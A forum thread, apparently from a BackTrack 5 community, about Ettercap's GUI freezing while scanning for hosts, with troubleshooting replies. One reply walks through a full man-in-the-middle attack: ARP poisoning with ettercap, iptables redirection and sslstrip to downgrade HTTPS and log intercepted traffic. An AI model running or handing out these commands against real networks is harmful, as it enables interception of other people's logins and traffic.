Ettercap-gtk crashes while scanning for hosts

[Jame5]

I just upgraded from BT4R2 to BT5 Gnome 64 on my Toshiba Satellite P305-S8823. Everything runs great airmon-ng, wireshark, and firefox installed adobe flash and synaptic, all working properly. But when I start Ettercap-gtk, unified sniff, scan for hosts -> and the ettercap's gui locks up, I've left it running for several minutes hoping it would resolve it self with no luck. I haven't even edited etter.conf yet... Anyone else having this problem?

[r083rt]

Code:

sudo apt-get remove --purge ettercap-gtk
sudo apt-get remove --purge ettercap-common
sudo apt-get install ettercap-gtk

r083rt

[gahndai]

purging and reinstalling does not help

ettercap is crashing after scanning 1023 hosts, no hosts are added to list

[r083rt]

have you setup ettercap use the command side and report back heres a little guide I wrote to help you

Code:

nano /etc/etter.conf

hold shift + press w then t
enter line 17 and you will see these lines you must change to 0

ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default

to this

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

hold shift + press w then t
type 1 then
hold shift + press w then t
type 168 and change the following lines

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to this

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

press ctrl+x and y to save

now time to start ettercap and sslstrip

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

start ettercap

Code:

ettercap -T -q -M ARP // // -i (interface)

just a word of warning // // will arp the whole network and depending on the size it can slow the network down to a crawl if you are using a very slow computer

you are better off using a selected host or hosts

Code:

ettercap -T -q -M ARP /gateway/ /target/

to get your gateway

Code:

netstat -nr

now start sslstrip to strip the https (Hypertext Transfer Protocol Secure) back to http((Hypertext Transfer Protocol)

open a new terminal

Code:

sslstrip -l 1000 -w capture.txt

you can also use other sslstrip options

Code:

sslstrip -k -f -l 10000 -w capture

-k kill all other sslstrip existing operations
-f favicon (the little lock icon ) pointless icon if anyone needs to be reassured just check the https heading when logging in if its (http) and not (https) it has been stripped or an error
-l listen on port 10000 all info form port 80 which is http will be redirected to port 1000
-w write the stripped code to specified file

********************************************IMPORT ANT********************************************

WHEN QUITTING ETTERCAP PRESS 'q' DO NOT JUST CLOSE THE TERMINAL THIS WILL RESULT IN DOS(denial of service) the arp needs to be resolved

with sslstrip exit by pressing ctrl+c

there is a hell of a lot more to it than this but im just giving you the basic to use the tool the rest is for you to learn


r083rt

[doublezero]

Curses seems to be working

[Jame5]

Thanks for the help.

Unfortunately. Ettercap-gtk still doesn't work (on my Satellite P305-S8823). I tried booting off the DVD to verify it wasn't some mistake I made. Still no joy. I tried running the same disc on another laptop (Satellite L645): Ettercap-gtk works great! Conclusion I have a hardware configuration problem. Probably need to tryout different drivers.

Thanks again,

Jame5

[Virulent87]

Got problems with ettercat-gtk.
when i start it and try to sniff any from thos two options he just close it self. i try remowe and r083rt thing but no helping.

Any know what might be a problem ?

[ghostdog67]

This is a common issue with ettercap, you need to learn how to use the command shell, its easier and wont crash, anyway if you need the GUI option, then type in terminal :
root@bt: ettercap -G
Good luck

[LHYX1]

Yeah, normally I always used the gui but in backtrack 5 in seems to crash almost every time so now I use ettercap via terminal. Like this it works perfectly

[Virulent87]

normaly i use gtk to
but gues il start using keyboard =)